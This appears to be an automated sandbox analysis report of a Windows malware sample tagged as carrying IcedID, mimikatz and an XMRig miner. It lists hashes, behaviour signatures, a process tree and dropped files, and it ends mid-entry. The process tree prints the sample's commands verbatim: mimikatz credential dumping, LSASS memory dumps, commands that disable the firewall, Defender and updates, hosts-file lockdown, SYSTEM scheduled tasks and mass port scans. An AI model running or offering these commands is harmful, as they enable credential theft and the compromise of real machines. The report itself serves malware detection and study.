Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    11-08-2024 13:44

General

  • Target

    2024-08-11_381851c920b54d6dab8626014b348572_hacktools_icedid_mimikatz.exe

  • Size

    9.5MB

  • MD5

    381851c920b54d6dab8626014b348572

  • SHA1

    ef904389491d2231a952a12cb932f4a2fd45320a

  • SHA256

    33486f4027ef9c089bfaa75fca1730feadb69adbcc09ed3bd994409f9f78fa8b

  • SHA512

    73b19a8e4b6ae58ba6f7a3bc62528e7b76f8e3f46bc895cc57309e00df338c82a7601caabd1154e607b378b0f87aadc5b2e0393373e9eeb3b2bd4528555b5b49

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (26182) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 24 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:288
      • C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe
        "C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1000
    • C:\Users\Admin\AppData\Local\Temp\2024-08-11_381851c920b54d6dab8626014b348572_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-11_381851c920b54d6dab8626014b348572_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ulmtuekc\bnckfmk.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2520
        • C:\Windows\ulmtuekc\bnckfmk.exe
          C:\Windows\ulmtuekc\bnckfmk.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2640
    • C:\Windows\ulmtuekc\bnckfmk.exe
      C:\Windows\ulmtuekc\bnckfmk.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2676
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2684
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2816
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:2580
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2880
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2912
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • Modifies data under HKEY_USERS
            PID:2720
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2576
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2596
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\nuiztummz\ztntlhjza\wpcap.exe /S
            2⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1060
            • C:\Windows\nuiztummz\ztntlhjza\wpcap.exe
              C:\Windows\nuiztummz\ztntlhjza\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:532
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1584
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2636
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2852
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2936
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2268
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                    PID:1632
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                    PID:2000
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1936
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:680
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2644
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2152
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                    PID:1532
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                        PID:444
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 start npf
                          4⤵
                            PID:1140
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Windows\nuiztummz\ztntlhjza\mltefvrkn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nuiztummz\ztntlhjza\Scant.txt
                        2⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2196
                        • C:\Windows\nuiztummz\ztntlhjza\mltefvrkn.exe
                          C:\Windows\nuiztummz\ztntlhjza\mltefvrkn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nuiztummz\ztntlhjza\Scant.txt
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:1384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Windows\nuiztummz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nuiztummz\Corporate\log.txt
                        2⤵
                        • Loads dropped DLL
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:480
                        • C:\Windows\nuiztummz\Corporate\vfshost.exe
                          C:\Windows\nuiztummz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:888
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yiqfznheb" /ru system /tr "cmd /c C:\Windows\ime\bnckfmk.exe"
                        2⤵
                          PID:1700
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2472
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "yiqfznheb" /ru system /tr "cmd /c C:\Windows\ime\bnckfmk.exe"
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:1604
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nlckcntjl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1756
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                              PID:2032
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /sc minute /mo 1 /tn "nlckcntjl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1600
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cvikquizn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1160
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2964
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /sc minute /mo 1 /tn "cvikquizn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:2328
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:1552
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2476
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2640
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:2820
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2144
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:2724
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:2620
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • Modifies data under HKEY_USERS
                            PID:836
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:1812
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:2944
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • Modifies data under HKEY_USERS
                            PID:1396
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:2636
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop SharedAccess
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2936
                            • C:\Windows\SysWOW64\net.exe
                              net stop SharedAccess
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2932
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop SharedAccess
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:772
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh firewall set opmode mode=disable
                            2⤵
                              PID:2008
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh firewall set opmode mode=disable
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                PID:376
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c netsh Advfirewall set allprofiles state off
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2584
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh Advfirewall set allprofiles state off
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                PID:2128
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop MpsSvc
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2104
                              • C:\Windows\SysWOW64\net.exe
                                net stop MpsSvc
                                3⤵
                                  PID:2528
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop MpsSvc
                                    4⤵
                                      PID:1796
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop WinDefend
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2036
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop WinDefend
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:444
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop WinDefend
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2524
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop wuauserv
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1948
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1384
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1680
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                    PID:532
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config MpsSvc start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:1364
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config SharedAccess start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1060
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2364
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2180
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WinDefend start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:1404
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config wuauserv start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1180
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      PID:2196
                                  • C:\Windows\TEMP\xohudmc.exe
                                    C:\Windows\TEMP\xohudmc.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2100
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 288 C:\Windows\TEMP\nuiztummz\288.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1776
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 1116 C:\Windows\TEMP\nuiztummz\1116.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2968
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 1164 C:\Windows\TEMP\nuiztummz\1164.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1992
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 1496 C:\Windows\TEMP\nuiztummz\1496.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2964
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 1708 C:\Windows\TEMP\nuiztummz\1708.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2704
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 700 C:\Windows\TEMP\nuiztummz\700.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2204
                                  • C:\Windows\TEMP\nuiztummz\etbivvidk.exe
                                    C:\Windows\TEMP\nuiztummz\etbivvidk.exe -accepteula -mp 2004 C:\Windows\TEMP\nuiztummz\2004.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3060
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c C:\Windows\nuiztummz\ztntlhjza\scan.bat
                                    2⤵
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:2104
                                    • C:\Windows\nuiztummz\ztntlhjza\gapccezup.exe
                                      gapccezup.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:1296
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                      PID:4028
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1676
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2460
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1556
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:580
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2664
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1760
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:852
                                  • C:\Windows\SysWOW64\ooeaya.exe
                                    C:\Windows\SysWOW64\ooeaya.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:556
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {39EE66BA-4ADF-4429-B2E2-E0598B1AEAE7} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:2896
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F
                                        2⤵
                                          PID:2884
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            3⤵
                                              PID:772
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F
                                              3⤵
                                                PID:1816
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F
                                              2⤵
                                                PID:2868
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  3⤵
                                                    PID:1328
                                                  • C:\Windows\system32\cacls.exe
                                                    cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F
                                                    3⤵
                                                      PID:1132
                                                  • C:\Windows\system32\cmd.EXE
                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bnckfmk.exe
                                                    2⤵
                                                      PID:2860
                                                      • C:\Windows\ime\bnckfmk.exe
                                                        C:\Windows\ime\bnckfmk.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2936
                                                    • C:\Windows\system32\cmd.EXE
                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F
                                                      2⤵
                                                        PID:4080
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:2412
                                                          • C:\Windows\system32\cacls.exe
                                                            cacls C:\Windows\TEMP\pdvalhbyc\gmhbqp.exe /p everyone:F
                                                            3⤵
                                                              PID:2600
                                                          • C:\Windows\system32\cmd.EXE
                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bnckfmk.exe
                                                            2⤵
                                                              PID:1108
                                                              • C:\Windows\ime\bnckfmk.exe
                                                                C:\Windows\ime\bnckfmk.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2572
                                                            • C:\Windows\system32\cmd.EXE
                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F
                                                              2⤵
                                                                PID:3712
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                  3⤵
                                                                    PID:480
                                                                  • C:\Windows\system32\cacls.exe
                                                                    cacls C:\Windows\ulmtuekc\bnckfmk.exe /p everyone:F
                                                                    3⤵
                                                                      PID:2088

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Windows\SysWOW64\Packet.dll

                                                                  Filesize

                                                                  95KB

                                                                  MD5

                                                                  86316be34481c1ed5b792169312673fd

                                                                  SHA1

                                                                  6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                  SHA256

                                                                  49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                  SHA512

                                                                  3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                • C:\Windows\SysWOW64\wpcap.dll

                                                                  Filesize

                                                                  275KB

                                                                  MD5

                                                                  4633b298d57014627831ccac89a2c50b

                                                                  SHA1

                                                                  e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                  SHA256

                                                                  b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                  SHA512

